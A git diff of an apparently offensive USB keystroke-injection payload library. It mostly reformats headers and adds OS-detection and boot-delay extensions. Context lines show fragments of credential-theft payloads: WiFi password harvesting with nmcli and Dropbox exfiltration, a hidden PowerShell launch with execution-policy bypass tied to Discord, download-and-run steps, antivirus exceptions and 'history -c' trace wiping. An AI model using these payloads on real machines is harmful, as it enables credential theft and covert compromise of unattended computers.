diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
index bb5b1b65a..3186ee3ea 100644
--- a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
+++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
@@ -1,27 +1,53 @@
-REM #######################################################
-REM # |
-REM # Title : Exfiltrate Wifi Passwords - Linux |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Credentials, Execution |
-REM # Target : Linux |
-REM # |
-REM #######################################################
+REM_BLOCK
+#######################################################
+# #
+# Title : Exfiltrate Wifi Passwords - Linux #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Credentials, Execution #
+# Target : Linux #
+# #
+#######################################################
+END_REM
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### PREREQUISITES SECTION ####
-
-
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
@@ -41,8 +67,6 @@ ENTER
REM #### ZIP SECTION ####
-
-
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
@@ -61,8 +85,6 @@ ENTER
REM #### WiFi && ZIP SECTION ####
-
-
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
@@ -85,8 +107,6 @@ DELAY 3000
REM #### EXFILTRATE SECTION ####
-
-
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
@@ -105,8 +125,6 @@ ENTER
REM #### REMOVE TRACES ####
-
-
DELAY 2000
STRING history -c
ENTER
diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
index 379fe4545..4b92997c7 100644
--- a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
@@ -10,8 +10,49 @@ REM # |
REM ###################################################################
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
diff --git a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
index 550a2c50f..c4b990716 100644
--- a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
+++ b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
@@ -1,24 +1,65 @@
-REM ########################################################
-REM # |
-REM # Title : Add An Exception To Avast Antivirus |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Add An Exception To Avast Antivirus #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Avast installed and configured
-
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Avast application
-DELAY 2000
GUI
DELAY 1000
STRING avast
diff --git a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
index a44c42a2f..10174db7f 100644
--- a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
+++ b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
@@ -1,13 +1,14 @@
-REM ##############################################
-REM # |
-REM # Title : Call Someone On An iPhone |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : iPhone |
-REM # |
-REM ##############################################
-
+REM_BLOCK
+##############################################
+# |
+# Title : Call Someone On An iPhone |
+# Author : Aleff |
+# Version : 1.0 |
+# Category : Execution |
+# Target : iPhone |
+# |
+##############################################
+END_REM
REM Requirements:
REM - The phone must be unlocked
diff --git a/payloads/library/execution/ChangeGitRemoteLink/payload.txt b/payloads/library/execution/ChangeGitRemoteLink/payload.txt
index eafac4163..0348ece21 100644
--- a/payloads/library/execution/ChangeGitRemoteLink/payload.txt
+++ b/payloads/library/execution/ChangeGitRemoteLink/payload.txt
@@ -1,12 +1,14 @@
-REM ###########################################
-REM # |
-REM # Title : Change Remote Git Link |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11/Linux |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Remote Git Link #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11/Linux #
+# #
+###########################################
+END_REM
REM Requirements:
REM - Internet Connection
diff --git a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
index e0c538fd5..3130f0d88 100644
--- a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
+++ b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
@@ -1,25 +1,50 @@
-
-REM ###########################################
-REM # |
-REM # Title : Change Linux MAC Address |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Linux MAC Address #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+###########################################
+END_REM
REM Requirements:
REM - Permissions
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
index af732aac6..60502ad4d 100644
--- a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
+++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
@@ -1,25 +1,49 @@
-
-REM ###############################################
-REM # |
-REM # Title : Change Network Configuration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ###############################################
+REM_BLOCK
+###############################################
+# #
+# Title : Change Network Configuration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+###############################################
+END_REM
REM Requirements:
REM - Permissions
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
diff --git a/payloads/library/execution/Change_Windows_User_Name/payload.txt b/payloads/library/execution/Change_Windows_User_Name/payload.txt
index d0d566df0..5b1d685d7 100644
--- a/payloads/library/execution/Change_Windows_User_Name/payload.txt
+++ b/payloads/library/execution/Change_Windows_User_Name/payload.txt
@@ -1,12 +1,14 @@
-REM #############################################
-REM # |
-REM # Title : Change Windows User Name |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM #############################################
+REM_BLOCK
+#############################################
+# #
+# Title : Change Windows User Name #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+#############################################
+END_REM
REM Requirements:
REM - Nothing
@@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng
REM Set the new name that you want to set
DEFINE NEW_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
REM Open Windows research
-DELAY 2000
GUI
DELAY 1000
diff --git a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
index 87e22c8e1..a85a62901 100644
--- a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
+++ b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # |
-REM # Title : Change the password of the Windows user |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Change the password of the Windows user #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Nothing (i know it's absurd)
@@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd)
REM You must define the new Windows user password
DEFINE NEW_PASSWORD example
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/README.md b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
index 8fb34f06a..c51257749 100644
--- a/payloads/library/execution/CloseAllApplicationsInWindows/README.md
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
@@ -1,4 +1,4 @@
-# Close All Applications - BADUSB ✅
+# Close All Applications
A script used to close all target open applications.
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
index 5c1bd2a34..eab598ee8 100644
--- a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
@@ -1,27 +1,69 @@
-REM #####################################################
-REM # |
-REM # Title : Close All Applications |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #####################################################
+REM_BLOCK
+#####################################################
+# #
+# Title : Close All Applications #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+#####################################################
+END_REM
REM Plug-And-Play
-REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
-REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHEL_CODE example.com
-DELAY 2000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 250
DOWNARROW
diff --git a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
index e109d552a..0729d4d13 100644
--- a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
+++ b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # #
-REM # Title : Defend yourself against AtlasVPN Bug-Door #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Defend yourself against AtlasVPN Bug-Door #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Administrator Permission
@@ -15,7 +17,34 @@ REM - AtlasVPN installed
REM Define the sudo user password
DEFINE #SUDO-PWS example
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
index 0a863ff86..c3c668404 100644
--- a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
+++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
@@ -1,14 +1,14 @@
-
-REM ################################################################
-REM # |
-REM # Title : Edit The Default Real App With An Arbitrary |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : GNU/Linux (Debian based tested) |
-REM # |
-REM ################################################################
-
+REM_BLOCK
+################################################################
+# #
+# Title : Edit The Default Real App With An Arbitrary #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : GNU/Linux (Debian based tested) #
+# #
+################################################################
+END_REM
REM Requirements:
REM - sudo permissions
@@ -16,11 +16,9 @@ REM - Internet connection
REM - Executable app
REM - '.desktop' file
-
REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
-
REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example
@@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed
DEFINE SUDO example
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
REM Open a shell
-DELAY 2000
CTRL-ALT t
DELAY 1000
diff --git a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
index 8aa455d98..0d3027336 100644
--- a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
+++ b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
@@ -1,25 +1,50 @@
-
-REM ################################################
-REM # |
-REM # Title : Exploiting An Executable File |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ################################################
+REM_BLOCK
+################################################
+# #
+# Title : Exploiting An Executable File #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+################################################
+END_REM
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
-DELAY 1000
-CTRL-ALT t
-DELAY 2000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
-REM #### Script ####
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+CTRL-ALT t
+DELAY 2000
+
+REM #### Script ####
STRINGLN
function search_file {
for file in "$1"/*; do
diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
index 4979471fb..3929e47ae 100644
--- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
+++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
@@ -108,18 +108,12 @@ Happy Hacking!
Github
-
-
- 
-
-
Instagram
- |
-
Discord
+
Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
index 80b90cbe0..3edb530b9 100644
--- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
+++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
@@ -1,27 +1,67 @@
-REM ###########################################################################################
-REM # |
-REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###########################################################################################
-
+REM_BLOCK
+###########################################################################################
+# #
+# Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+###########################################################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM Define here your hexadecimal code
DEFINE #HEX_CODE example
-
REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 1000
STRINGLN notepad.exe
diff --git a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
index 1ed9ed86d..12813ca31 100644
--- a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
+++ b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
@@ -1,12 +1,14 @@
-REM ##################################################################
-REM # |
-REM # Title : Make Windows performant (but ugly and boring) |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ##################################################################
+REM_BLOCK
+##################################################################
+# #
+# Title : Make Windows performant (but ugly and boring) #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+##################################################################
+END_REM
REM Plug-And-Play <3
@@ -16,7 +18,48 @@ REM - Nothing
REM Note:
REM - Payload tested on Windows 11 Eng
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
